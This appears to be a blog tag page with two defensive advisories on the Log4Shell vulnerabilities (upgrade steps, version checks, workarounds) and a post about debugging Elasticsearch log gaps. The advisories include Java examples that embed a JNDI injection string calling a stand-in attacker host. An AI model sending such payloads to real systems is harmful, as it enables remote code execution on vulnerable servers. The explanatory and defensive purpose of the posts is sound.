Tag: log4J

  • Log4j 2.16.0 Fixes Critical Vulnerabilities: What You Need to Know

    Apache Log4j 2.16.0 Is Now Available – Critical Update Required

    A follow-on vulnerability in Log4j (CVE-2021-45046) has been discovered and fixed in version 2.16.0, which also hardens the original fix for CVE-2021-44228 by removing message lookups entirely. If you’re still using version 2.15.0 or earlier, your applications may remain vulnerable in certain non-default configurations.

    This is a follow-up to my previous post: Log4J Zero-Day Exploit: Explained with Fixes.

    Here’s why this update is critical and what you need to do.

    TL;DR

    If you’re short on time, here’s the gist:

    • Upgrade your Log4j library to version 2.16.0 immediately.
    • The newer version completely removes the risky message lookup feature, which was the critical enabler of these exploits.
    • Visit the Apache Log4j Security Page for the latest updates.

    Why Version 2.15.0 Isn’t Enough

    While version 2.15.0 addressed initial vulnerabilities, it left certain configurations exposed. Specifically, using the Thread Context value in the log message Pattern Layout could still allow exploitation. Version 2.16.0 eliminates this risk by fully removing the message lookup functionality.
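
    For illustration, here is a minimal sketch of the kind of logging that stayed risky on 2.15.0 (the class name, the header name, and the attacker.example.com URL are placeholders): an attacker-controlled value placed in the Thread Context, combined with a non-default Pattern Layout that references that context key.

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    import org.apache.logging.log4j.ThreadContext;

    public class ContextLookupExample {
        private static final Logger logger = LogManager.getLogger(ContextLookupExample.class);

        public static void main(String[] args) {
            // Hypothetical attacker-controlled value, e.g. copied from an HTTP header.
            ThreadContext.put("userAgent", "${jndi:ldap://attacker.example.com/a}");

            // With a non-default pattern layout such as
            //   %d %p %c{1.} [%t] $${ctx:userAgent} %m%n
            // Log4j 2.15.0 could still resolve the ${jndi:...} expression embedded in the
            // context value when this line is logged; 2.16.0 removes message lookups entirely.
            logger.info("handling request");

            ThreadContext.clearAll();
        }
    }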

    Misleading Fixes to Avoid

    Not all solutions floating around the community are effective. Avoid relying on the following:

    • Updating just the Java version.
    • Filtering vulnerabilities using Web Application Firewalls (WAF).
    • Modifying the log statement format to %m{nolookups}.

    These approaches won’t fully mitigate the vulnerabilities, so upgrading to version 2.16.0 is your safest bet.

    How to Stay Updated

    The Log4j exploit has drawn global attention, leading to a flood of information, some of which is inaccurate. For reliable updates, stick to trusted sources such as the official Apache Log4j Security Page.

    What’s Next?

    This is an evolving situation, and further updates may arise. Bookmark the Apache Log4j Security Page and check it regularly for announcements to stay ahead of potential risks.

  • Log4J Zero-Day Exploit: Explained with Fixes

    Note: Check out my latest blog for updated information and solutions on this issue: Log4j 2.16.0 Fixes Critical Vulnerabilities: What You Need to Know

    The best evidence I have seen so far is a “Little Bobby Tables”-style exploit doing the rounds on LinkedIn 🫣

    Overview: What Is the Log4J Zero-Day Exploit (CVE-2021-44228)?

    A critical zero-day exploit affecting the widely used Log4J library has been identified and fixed in version 2.15.0. This vulnerability (CVE-2021-44228) allows attackers to gain complete control of your server remotely—making it one of the most dangerous Java-based vulnerabilities to date.

    For details, visit the Apache Log4j Security Page. This isn’t just a Java developer’s headache—it’s a wake-up call for every engineer, security specialist, and even non-Java tech teams whose tools rely on Log4J indirectly (looking at you, Elasticsearch and Atlassian users).

    This post explains:

    1. How the exploit works.
    2. How to check if you’re affected.
    3. Step-by-step fixes to secure your applications.

    Quick Summary

    • Upgrade Log4J to version 2.15.0 or later immediately.
    • Workarounds exist for systems where upgrading isn’t feasible (see below).
    • Popular apps like Elasticsearch, Minecraft, and Jira are affected.

    Understanding the Exploit

    The vulnerability lies in log4j-core versions 2.0-beta9 to 2.14.1. When an application logs user inputs using Log4J, the exploit allows malicious actors to execute arbitrary code remotely. In practical terms, if your app takes user input and logs it, you’re at risk.
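
    As a minimal sketch of the attack path (the class name and the attacker.example.com URL are placeholders), any ordinary log statement that includes attacker-supplied text is enough to trigger the lookup on a vulnerable version:

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class VulnerableLoggingExample {
        private static final Logger logger = LogManager.getLogger(VulnerableLoggingExample.class);

        public static void main(String[] args) {
            // Hypothetical attacker-controlled input, e.g. a User-Agent header or a form field.
            String userInput = "${jndi:ldap://attacker.example.com/a}";

            // On log4j-core 2.0-beta9 through 2.14.1, message lookups resolve the ${jndi:...}
            // expression at log time, which can let the JVM fetch and execute attacker-hosted code.
            logger.info("Received request from: {}", userInput);
        }
    }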

    Am I Affected?

    If your system runs Java and incorporates log4j-core, either directly or through dependencies, assume you’re affected. Use tools like Maven or Gradle to identify the versions in your project. Here’s how:

    For Gradle

    ./gradlew dependencies | grep "log4j"

    For Maven

    mvn dependency:tree | grep log4j

    Most Java applications log user inputs, making this a near-universal issue. Be proactive and investigate now.
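
    As a complement to the build-tool checks above, here is a small sketch (the class name is mine) that inspects the running application instead; it only detects log4j-core that is visible on that JVM’s classpath, and the version may print as null if the jar’s manifest omits it.

    public class Log4jVersionCheck {
        public static void main(String[] args) {
            try {
                // A class that only exists in log4j-core (not in the log4j-api jar).
                Class<?> coreLogger = Class.forName("org.apache.logging.log4j.core.Logger");
                // Reads Implementation-Version from the log4j-core jar manifest, if present.
                Package pkg = coreLogger.getPackage();
                String version = (pkg == null) ? null : pkg.getImplementationVersion();
                System.out.println("log4j-core version: " + version);
            } catch (ClassNotFoundException e) {
                System.out.println("log4j-core is not on the classpath");
            }
        }
    }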

    How to Fix the Log4J Vulnerability

    1. Upgrade Your Log4J Version

    The most reliable solution is upgrading to Log4J 2.15.0 or newer. Here’s how for common tools:

    Maven

    If your build inherits dependency management (for example, from the Spring Boot parent POM), override the managed version property:

    <properties>
      <log4j2.version>2.15.0</log4j2.version>
    </properties>

    Then verify the fix with:

    mvn dependency:list | grep log4j

    Gradle

    implementation(platform("org.apache.logging.log4j:log4j-bom:2.15.0"))

    Then confirm the version fix with:

    ./gradlew dependencyInsight --dependency log4j-core

    2. Workarounds If Upgrading Isn’t Feasible

    For systems running Log4J 2.10 or later, use these temporary fixes:

    Add the system property:

    -Dlog4j2.formatMsgNoLookups=true

    Or set the environment variable:

    LOG4J_FORMAT_MSG_NO_LOOKUPS=true

    For JVM-based apps, modify the launch command:

    java -Dlog4j2.formatMsgNoLookups=true -jar myapplication.jar
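
    If you cannot touch the launch command, one option is to set the property programmatically from a wrapper entry point. This is only a sketch (SafeLauncher and MyApplication are hypothetical names), and it only works if it runs before any Log4j class is initialized.

    public class SafeLauncher {
        public static void main(String[] args) {
            // Must run before the first Log4j class is loaded, or the flag is ignored.
            System.setProperty("log4j2.formatMsgNoLookups", "true");

            // Hand off to the real application entry point afterwards, e.g.:
            // MyApplication.main(args);   // MyApplication is a hypothetical placeholder
        }
    }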

    Applications Known to Be Affected

    Even if you’re not directly using Log4J, many popular tools and libraries depend on it. Here’s a (non-exhaustive) list of systems at risk:

    • Frameworks and libraries: Spring Boot, Struts
    • Applications: Elasticsearch, Kafka, Solr, Jira, Confluence, Logstash, Minecraft
    • Services: Steam, Apple iCloud

    If you’re using any of these, check their documentation for specific patches or updates.

    Final Reminder: Why This Matters

    Apache has rated this vulnerability as critical. Exploiting it allows remote attackers to execute arbitrary code as the server user, potentially with root access. Worm-like attacks that propagate automatically are possible.

    To stay secure:

    1. Upgrade or apply workarounds immediately.
    2. Regularly monitor the Apache Log4j Security Page for updates.

    Additional Resources

    • Apache Log4j Security Page: the authoritative source for vulnerability details and fixed versions.
    • Log4j 2.16.0 Fixes Critical Vulnerabilities: What You Need to Know (my follow-up post on the 2.16.0 release).

  • The Case of Missing Elasticsearch Logs: A Midnight Mystery

    While debugging my Elasticsearch instance, I noticed a curious issue: logs would vanish consistently at midnight. No logs appeared between 23:40:00 and 00:00:05, leaving an unexplained gap. This guide walks through the debugging process, root cause identification, and a simple fix.

    Initial Investigation: Where Did the Logs Go?

    At first glance, the following possibilities seemed likely:

    1. Log Rotation: Elasticsearch rotates its logs at midnight. Could this process be causing the missing lines?
    2. Marvel Indices: Marvel creates daily indices at midnight. Could this interfere with log generation?

    Neither explained the issue upon closer inspection, so I dug deeper.

    The Real Culprit: Log4j and DailyRollingFileAppender

    The issue turned out to be related to Log4j. Elasticsearch uses Log4j for logging, but instead of a traditional log4j.properties file, it employs a translated YAML configuration. After reviewing the logging configuration, I found the culprit: DailyRollingFileAppender.

    What’s Wrong with DailyRollingFileAppender?

    The DailyRollingFileAppender class extends Log4j’s FileAppender and rolls the underlying log file at a user-chosen interval (daily, in Elasticsearch’s case). Unfortunately, it is known to exhibit:

    • Data Loss: Logs might not be written during the rolling process.
    • Synchronization Issues: Overlap between log files leads to missing data.

    This behavior is well-documented in the Apache DailyRollingFileAppender documentation.

    Root Cause: Why Were Logs Missing?

    The missing logs were a direct result of using DailyRollingFileAppender, which failed to properly handle log rotation at midnight. This caused gaps in logging during the critical period when the file was being rolled over.

    The Fix: Switch to RollingFileAppender

    To resolve this, I replaced DailyRollingFileAppender with RollingFileAppender, which rolls logs based on file size rather than a specific time. This eliminates the synchronization issues associated with the daily rolling behavior.

    Updated YAML Configuration

    Here’s how I updated the configuration:

    file:
      type: rollingFile
      file: ${path.logs}/${cluster.name}.log
      maxFileSize: 100MB
      maxBackupIndex: 10
      layout:
        type: pattern
        conversionPattern: "[%d{ISO8601}][%-5p][%-25c] %m%n"

    Key Changes:

    • Type: Changed from dailyRollingFile to rollingFile.
    • File Size Limit: Set maxFileSize to 100MB.
    • Backup: Retain up to 10 backup log files.
    • Removed Date Pattern: Eliminated the problematic datePattern field used by DailyRollingFileAppender.
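
    For readers outside Elasticsearch, here is a hedged sketch of roughly the same settings expressed directly against the log4j 1.x API that the YAML above is translated into; the class name is mine, and the file name stands in for ${path.logs}/${cluster.name}.log.

    import org.apache.log4j.Logger;
    import org.apache.log4j.PatternLayout;
    import org.apache.log4j.RollingFileAppender;

    public class RollingFileSetup {
        public static void main(String[] args) throws Exception {
            // Size-based rolling instead of the time-based DailyRollingFileAppender.
            RollingFileAppender appender = new RollingFileAppender(
                    new PatternLayout("[%d{ISO8601}][%-5p][%-25c] %m%n"),
                    "my-cluster.log");          // placeholder for ${path.logs}/${cluster.name}.log
            appender.setMaxFileSize("100MB");   // roll once the file reaches 100 MB
            appender.setMaxBackupIndex(10);     // keep up to 10 rolled files

            Logger.getRootLogger().addAppender(appender);
            Logger.getRootLogger().info("rolling file appender configured");
        }
    }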

    Happy Ending: Logs Restored

    After implementing the fix, Elasticsearch logs stopped disappearing. Interestingly, further investigation revealed that the midnight log gap was also related to Marvel indices transitioning into a new day. This caused brief latency as new indices were created for shards and replicas.

    Lessons Learned

    1. Understand Your Tools: Familiarity with Log4j’s appenders helped identify the issue quickly.
    2. Avoid Deprecated Features: DailyRollingFileAppender is prone to issues—switch to RollingFileAppender for modern setups.
    3. Analyze Related Systems: The Marvel index creation provided additional context for the midnight timing.

    Conclusion

    Debugging missing Elasticsearch logs required diving into the logging configuration and understanding how appenders handle file rolling. By switching to RollingFileAppender, I resolved the synchronization issues and restored the missing logs.

    If you’re experiencing similar issues, check your logging configuration and avoid using DailyRollingFileAppender in favor of RollingFileAppender. This can save hours of debugging in the future.

    For more insights, explore Log4j Appender Documentation.

    Also, to learn how to clean data coming into Elasticsearch see Cleaning Elasticsearch Data Before Indexing.